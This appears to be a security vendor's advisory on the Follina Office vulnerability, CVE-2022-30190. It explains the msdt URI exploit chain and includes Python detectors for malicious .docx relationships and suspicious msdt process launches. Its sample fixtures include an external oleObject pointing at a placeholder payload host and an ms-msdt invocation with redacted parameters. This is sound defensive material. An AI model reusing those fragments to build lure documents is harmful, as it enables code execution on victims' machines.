A new zero-day vulnerability affecting Microsoft Office applications, dubbed “Follina” (tracked as CVE-2022-30190), has been discovered in the past few days. In some cases it behaves as a “zero click” remote code execution: the exploit can fire without the victim actually opening the file, for example when the document is rendered by the Windows Explorer preview pane.
Follina works by abusing the Microsoft Support Diagnostic Tool (msdt.exe), which is reachable through the ms-msdt: URI scheme and runs even when macros have been disabled. The chain starts with an external relationship (a .rels entry) inside a Microsoft Office document that calls out to an attacker-controlled server and downloads a malicious HTML file. That HTML file then invokes msdt through its URI handler, and the parameters it passes cause msdt to run the attacker's command. Evidence of active exploitation can be traced back at least a month, to a sample uploaded to a malware sandbox at that time. Note that when the lure is a Rich Text Format (.rtf) file, the chain can also be triggered by the Explorer preview pane, so the file never has to be opened.
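The two artefacts described above, the external oleObject relationship inside the document and the ms-msdt: URI in the fetched HTML, are what a responder can check statically. The following is an added example written for this page, not Brace168's detection content: it builds a minimal .docx in memory with a constructed relationship file (the host name example.invalid is a placeholder), lists every external oleObject target it carries, and flags HTML that references the ms-msdt: scheme. The HTML is likewise a constructed stand-in for the payload page, with the attacker parameters replaced by `[...]`.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Constructed relationship file in the shape a weaponised document uses: the
# oleObject relationship is marked External and points at a web server instead
# of an embedded object. The host name is a placeholder, not a real IOC.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://example.invalid/payload.html" TargetMode="External"/>
</Relationships>
"""

# Constructed stand-in for the fetched HTML: the diagnostic tool is reached
# through its URI scheme and the attacker's parameters follow /param.
SAMPLE_HTML = """<!doctype html>
<html><body><script>
  window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=[...]"';
</script></body></html>
"""

MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def build_sample_docx() -> bytes:
    """Assemble a minimal .docx (a zip container) carrying the sample .rels file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return (rels file, target) for every oleObject relationship that is External.

    A benign document embeds its OLE objects; an external target fetched over
    HTTP is the first link of the Follina chain.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append((name, rel.get("Target")))
    return hits


def html_invokes_msdt(html: str) -> bool:
    """True if the page references the ms-msdt: URI scheme anywhere."""
    return bool(MSDT_URI.search(html))


if __name__ == "__main__":
    for rels_file, target in external_ole_targets(build_sample_docx()):
        print(f"external oleObject in {rels_file}: {target}")
    print("HTML invokes msdt:", html_invokes_msdt(SAMPLE_HTML))
```

The relationship check is the more reliable of the two, because the document on disk is all a responder has before the server is taken down; the HTML check only applies to a payload that was captured from the network or the sandbox.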
Brace168 has pushed new detection rules to identify any execution or exploitation of the “Follina” zero-day within client environments. The Brace168 threat hunt team is also conducting retrospective hunts to identify any activity that may have already occurred.
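For the telemetry side of such a hunt, the observable is msdt.exe being started with an ms-msdt: URI (or the IT_BrowseForFile parameters) on its command line. The following added example is not Brace168's rule set; it runs that logic over constructed process-creation events in a Sysmon Event ID 1 style (field names and the list of Office parent processes are assumptions). Because the .rtf preview-pane case is launched by explorer.exe rather than an Office binary, the check keys on the msdt command line first and uses the parent only to rank severity.

```python
import re

# Office binaries expected as the parent when a document is opened normally.
# This set is an assumption for the example, extend it for your estate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Either indicator on an msdt.exe command line is enough to raise an alert.
MSDT_PATTERNS = (
    re.compile(r"ms-msdt:", re.IGNORECASE),
    re.compile(r"IT_(Re)?BrowseForFile=", re.IGNORECASE),
)

# Constructed events (not real telemetry): 1 is the Office-launched chain,
# 2 is the .rtf preview-pane variant, 3 is a legitimate troubleshooter run,
# 4 is an unrelated Office child process.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=[...]"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=[...]"'},
    {"id": 3, "parent": r"C:\Windows\System32\control.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" -id NetworkDiagnosticsNetworkAdapter'},
    {"id": 4, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a severity for a suspicious msdt launch, or None if benign."""
    if basename(event["image"]) != "msdt.exe":
        return None
    if not any(p.search(event["cmdline"]) for p in MSDT_PATTERNS):
        return None  # ordinary troubleshooter invocation, e.g. "-id ..."
    if basename(event["parent"]) in OFFICE_PARENTS:
        return "high"    # document opened in Office triggered the URI handler
    return "medium"      # e.g. explorer.exe rendering an .rtf in the preview pane


def hunt(events: list) -> dict:
    """Map event id to severity for every event that matches."""
    results = {}
    for event in events:
        severity = classify(event)
        if severity is not None:
            results[event["id"]] = severity
    return results


if __name__ == "__main__":
    for event_id, severity in hunt(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {severity}")
```

A rule written only as "Office parent spawns msdt.exe" would miss event 2 entirely, which is why the command-line indicators carry the detection and the parent lineage only adjusts the priority.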